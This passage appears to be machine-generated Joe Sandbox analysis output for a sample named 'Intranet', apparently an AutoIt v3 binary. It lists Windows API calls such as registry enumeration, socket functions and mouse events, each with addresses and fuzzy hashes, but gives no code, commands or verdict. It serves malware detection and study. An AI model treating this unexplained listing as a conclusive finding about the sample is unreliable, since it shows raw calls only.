                                                                            • __mtinitlocks.LIBCMT ref: 004C9D1B
                                                                            • __mtterm.LIBCMT ref: 004C9D24
                                                                              • Part of subcall function 004C9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,004C9D29,004C7EFD,0055CD38,00000014), ref: 004C9E86
                                                                              • Part of subcall function 004C9D8C: _free.LIBCMT ref: 004C9E8D
                                                                              • Part of subcall function 004C9D8C: DeleteCriticalSection.KERNEL32(00560C00,?,?,004C9D29,004C7EFD,0055CD38,00000014), ref: 004C9EAF
                                                                            • __calloc_crt.LIBCMT ref: 004C9D49
                                                                            • __initptd.LIBCMT ref: 004C9D6B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004C9D72
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 3567560977-0
                                                                            • Opcode ID: aaf22032a1c16ecfa5d24208e9cb53b6fdf0a4712d0e0b1087653825f3201e82
                                                                            • Instruction ID: 7b10716be2b7dd16cadc96eb566c356b919bf4c90005dc46b3d6b1751733353b
                                                                            • Opcode Fuzzy Hash: aaf22032a1c16ecfa5d24208e9cb53b6fdf0a4712d0e0b1087653825f3201e82
                                                                            • Instruction Fuzzy Hash: C2F0A93A5097113AE7A43B3A7C0BF8B2684DB41738F20021FF462E61D2EF288C00419C
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001,00568290,004B5328), ref: 004B5109
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B512A
                                                                            • ShowWindow.USER32(00000000), ref: 004B513E
                                                                            • ShowWindow.USER32(00000000), ref: 004B5147
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 98a847c5cbf673e302973ef0bb300a48487cc7b5f95960319a3817dc82373794
                                                                            • Instruction ID: 99cb707fe8b2338da7be41206972bced073c033fead438c363987e5c74d9f5f2
                                                                            • Opcode Fuzzy Hash: 98a847c5cbf673e302973ef0bb300a48487cc7b5f95960319a3817dc82373794
                                                                            • Instruction Fuzzy Hash: 02F0DA755453987EEA31172B6C69E272E7DE7DAF54F01011AF900A32B0CAA11855EAB0
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,004C4282,?), ref: 004C41D3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C41DA
                                                                            • EncodePointer.KERNEL32(00000000), ref: 004C41E6
                                                                            • DecodePointer.KERNEL32(00000001,004C4282,?), ref: 004C4203
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoInitialize$combase.dll
                                                                            • API String ID: 3489934621-340411864
                                                                            • Opcode ID: be7d1c484ecb96d70d742583c5abd62050e3c5b0c0202d296ad139a4657817f2
                                                                            • Instruction ID: d4a9b3aad8bc5db56823a4f4fbe53251f93f56f843f54be7156e6ff4eab95fb6
                                                                            • Opcode Fuzzy Hash: be7d1c484ecb96d70d742583c5abd62050e3c5b0c0202d296ad139a4657817f2
                                                                            • Instruction Fuzzy Hash: A3E01A74690B01AFEB501F78ED5DB193A64B772B06F606928F481D62E0EBF9418CEF04
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004C41A8), ref: 004C42A8
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C42AF
                                                                            • EncodePointer.KERNEL32(00000000), ref: 004C42BA
                                                                            • DecodePointer.KERNEL32(004C41A8), ref: 004C42D5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 3489934621-2819208100
                                                                            • Opcode ID: edd49bd3798b1660717df508d35c12e2d13118f64402c01a98e97fd7dde74669
                                                                            • Instruction ID: 31680c6e67739659ecbe963f89cc6d5aaf5a27b529a6424c9dd466007ef5a5fb
                                                                            • Opcode Fuzzy Hash: edd49bd3798b1660717df508d35c12e2d13118f64402c01a98e97fd7dde74669
                                                                            • Instruction Fuzzy Hash: FFE0EC74590700AFEB509F64ED1DF453A64B771B82F501969F081D66F0DBF8450CEB14
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 004A21B8
                                                                            • GetWindowRect.USER32(?,?), ref: 004A21F9
                                                                            • ScreenToClient.USER32(?,?), ref: 004A2221
                                                                            • GetClientRect.USER32(?,?), ref: 004A2350
                                                                            • GetWindowRect.USER32(?,?), ref: 004A2369
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            • Opcode ID: f3dbac3ff4d4528e62770ee2e9f73b02664fba0cce563da935d57a13e67fd736
                                                                            • Instruction ID: 6fd1a08b99a068597f6fcf08811127f63487b004897c2dfc20dbd3e03b1811ba
                                                                            • Opcode Fuzzy Hash: f3dbac3ff4d4528e62770ee2e9f73b02664fba0cce563da935d57a13e67fd736
                                                                            • Instruction Fuzzy Hash: B0B18B39900209DBDF10CFA8C6807EEB7B1FF19310F14816AED59AB354DB78A940DB59
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 3253778849-0
                                                                            • Opcode ID: 2696e12063a3b11363449afd863cb5a64b0c4321d8bd4eeec82fdae650dcda9c
                                                                            • Instruction ID: 218a91d4eb6c0319ffa1af2d62ab31c90bd99fa625fb934e04e6809cc67c314e
                                                                            • Opcode Fuzzy Hash: 2696e12063a3b11363449afd863cb5a64b0c4321d8bd4eeec82fdae650dcda9c
                                                                            • Instruction Fuzzy Hash: AB61CD3050025AABCB11EF61C895EFE3BA8BF86308F44455EF8556B1E2DB38EC55CB64
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 0052147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0052091D
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0052095D
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00520980
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005209A9
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005209EC
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 005209F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                            • String ID:
                                                                            • API String ID: 4046560759-0
                                                                            • Opcode ID: 8f7b12a29d4e0150e1af3ba520a428a425a0f53bf46231c1ff6b8dcdd3284b5a
                                                                            • Instruction ID: 7adfa4f554ffc1a68ccf27bfe2e5dbec70ce1ceba4ea7eb42b8a0affb505de2e
                                                                            • Opcode Fuzzy Hash: 8f7b12a29d4e0150e1af3ba520a428a425a0f53bf46231c1ff6b8dcdd3284b5a
                                                                            • Instruction Fuzzy Hash: 85517831208204AFD704EB65C895E6FBBA8FF86314F04491EF586872E2DB35E945CB52
                                                                            APIs
                                                                            • GetMenu.USER32(?,00000001,00000000), ref: 00525E38
                                                                            • GetMenuItemCount.USER32(00000000), ref: 00525E6F
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00525E97
                                                                            • GetMenuItemID.USER32(?,?), ref: 00525F06
                                                                            • GetSubMenu.USER32(?,?), ref: 00525F14
                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00525F65
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountMessagePostString
                                                                            • String ID:
                                                                            • API String ID: 650687236-0
                                                                            • Opcode ID: da298ea21eff73da7735a7b6d373bf03baa23e646d6e5a62b8f8433cc8b37524
                                                                            • Instruction ID: e818a847c417a677e326745ee542415817d8956754b58761d88e0651e0890912
                                                                            • Opcode Fuzzy Hash: da298ea21eff73da7735a7b6d373bf03baa23e646d6e5a62b8f8433cc8b37524
                                                                            • Instruction Fuzzy Hash: 2A51EE75A00625AFCF11EF65C945AAEBBB4FF49320F01409AF901BB391DB74AE41CB90
                                                                            APIs
                                                                            • #8.OLEAUT32(?,00000000,?,?,?,?,?,?,00000024), ref: 004FF6A2
                                                                            • #9.WSOCK32(00000013,?,?,?,?,00000024), ref: 004FF714
                                                                            • #9.WSOCK32(00000000,?,?,?,?,00000024), ref: 004FF76F
                                                                            • _memmove.LIBCMT ref: 004FF799
                                                                            • #9.WSOCK32(?,?,?,?,?,00000024), ref: 004FF7E6
                                                                            • #12.WSOCK32(?,?,00000000,00000013,00000000,?,?,?,?,?,?,00000024), ref: 004FF814
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: e423e7a1d37836b1d663eb6be5411656be913b5b55ddcb8339e16f3047782733
                                                                            • Instruction ID: 78632d9a1c2a569df2186211d568c1160b0803809b0ad11701b3f3a688314cdb
                                                                            • Opcode Fuzzy Hash: e423e7a1d37836b1d663eb6be5411656be913b5b55ddcb8339e16f3047782733
                                                                            • Instruction Fuzzy Hash: 97516BB5A00209EFCB14DF58C884AAAB7F8FF4C354B15856AEA59DB340D734E915CFA0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 005029FF
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030,000000FF,000000FF,00567890,00000000,000BED90), ref: 00502A4A
                                                                            • IsMenu.USER32(00000000), ref: 00502A6A
                                                                            • CreatePopupMenu.USER32(00567890,00000000,000BED90), ref: 00502A9E
                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00502AFC
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00502B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                            • String ID:
                                                                            • API String ID: 3311875123-0
                                                                            • Opcode ID: c1ab9b0f45011d540af1750c28fb0a694c9abe9b4798dcbd4162594da0051be9
                                                                            • Instruction ID: 30238dfe84391b625cc2dfaa9c80583ed9c4f297ec7458ffd1e6a418cad9d7a6
                                                                            • Opcode Fuzzy Hash: c1ab9b0f45011d540af1750c28fb0a694c9abe9b4798dcbd4162594da0051be9
                                                                            • Instruction Fuzzy Hash: B8518A70A0030AABDF25CF68D88CAAEBFF4BF54314F144559E8159B2E1D7B09948CB51
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 004A1B76
                                                                            • GetWindowRect.USER32(?,?), ref: 004A1BDA
                                                                            • ScreenToClient.USER32(?,?), ref: 004A1BF7
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004A1C08
                                                                            • EndPaint.USER32(?,?), ref: 004A1C52
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 1827037458-0
                                                                            • Opcode ID: 289382d4ae695bac9b298573aa0794e037c27842e876ea3833477dbc77ef5d81
                                                                            • Instruction ID: 9f91efdcd93faf02f7f48ab8ecc102f917aaa050600450996bcb4c318c5a584a
                                                                            • Opcode Fuzzy Hash: 289382d4ae695bac9b298573aa0794e037c27842e876ea3833477dbc77ef5d81
                                                                            • Instruction Fuzzy Hash: 4741D330104304AFD710DF24CC98FAB7BE8EB6A364F14056AF595872B2C774A849EB65
                                                                            APIs
                                                                            • ShowWindow.USER32(005677B0,00000000,?,?,?,005677B0,?,0052BC1A,?,?), ref: 0052BD84
                                                                            • EnableWindow.USER32(?,00000000,?,0052BC1A,?,?), ref: 0052BDA8
                                                                            • ShowWindow.USER32(005677B0,00000000,?,?,?,005677B0,?,0052BC1A,?,?), ref: 0052BE08
                                                                            • ShowWindow.USER32(?,00000004,?,0052BC1A,?,?), ref: 0052BE1A
                                                                            • EnableWindow.USER32(?,00000001,?,0052BC1A,?,?), ref: 0052BE3E
                                                                            • SendMessageW.USER32(?,0000130C,?,00000000,?,?,?,005677B0,?,0052BC1A,?,?), ref: 0052BE61
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: ad0d60f4c606b99c151f71a2886394acd63d4fdf8d9b7ee3afbfacb76c3db9d7
                                                                            • Instruction ID: ab1b1785db60de98812d51a22a69ce86bf756ce90502c045ca83d0983aa7e63a
                                                                            • Opcode Fuzzy Hash: ad0d60f4c606b99c151f71a2886394acd63d4fdf8d9b7ee3afbfacb76c3db9d7
                                                                            • Instruction Fuzzy Hash: 36416D74600264AFEB26CF28D49ABD47FF5FF06314F1941A9EA488F2E2C731A845CB51
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,0051550C,?,?,00000000,00000001), ref: 00517796
                                                                              • Part of subcall function 0051406C: GetWindowRect.USER32(?,?), ref: 0051407F
                                                                            • GetDesktopWindow.USER32(?,?,?,?,0051550C,?,?,00000000,00000001), ref: 005177C0
                                                                            • GetWindowRect.USER32(00000000,?,?,?,0051550C,?,?,00000000,00000001), ref: 005177C7
                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001,?,?,?,?,?,0051550C,?,?,00000000,00000001), ref: 005177F9
                                                                              • Part of subcall function 005057FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505877
                                                                            • GetCursorPos.USER32(?,?,?,?,?,?,0051550C,?,?,00000000,00000001), ref: 00517825
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000,?,?,?,?,?,?,?,0051550C,?,?,00000000), ref: 00517883
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 19fecc456908191b07051b3836ad1dcb6175b6a3bfd3c52c68266e00ea20398d
                                                                            • Instruction ID: 6533f1846fab84d52083740770f172c68b3770959f614f1495deadc0d4e1973b
                                                                            • Opcode Fuzzy Hash: 19fecc456908191b07051b3836ad1dcb6175b6a3bfd3c52c68266e00ea20398d
                                                                            • Instruction Fuzzy Hash: A231AF7250830AABD720DF58C849F9BBBA9FB88314F000919F58997191DA30E949CBA2
                                                                            APIs
                                                                            • #23.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005169C7
                                                                            • #111.WSOCK32(00000000), ref: 005169D6
                                                                            • #2.WSOCK32(00000000,?,00000010), ref: 005169F2
                                                                            • #13.WSOCK32(00000000,00000005), ref: 00516A01
                                                                            • #111.WSOCK32(00000000), ref: 00516A1B
                                                                            • #3.WSOCK32(00000000,00000000), ref: 00516A2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #111
                                                                            • String ID:
                                                                            • API String ID: 568940515-0
                                                                            • Opcode ID: 2f2f997f62c96897b67709e4abddf6fc23ae41df1abf72d34dd5ace7a7c5c4b2
                                                                            • Instruction ID: f8d08601c2db2a3f75789a69d023c4fa58ce946a272777853320bda3000f1d6a
                                                                            • Opcode Fuzzy Hash: 2f2f997f62c96897b67709e4abddf6fc23ae41df1abf72d34dd5ace7a7c5c4b2
                                                                            • Instruction Fuzzy Hash: CB210130200200AFDB00EF64CD99AAEBBA9FF94724F10855DF956A73D1CB74AC45DB90
                                                                            APIs
                                                                              • Part of subcall function 004F8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004F8CDE
                                                                              • Part of subcall function 004F8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004F8CE8
                                                                              • Part of subcall function 004F8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004F8CF7
                                                                              • Part of subcall function 004F8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004F8CFE
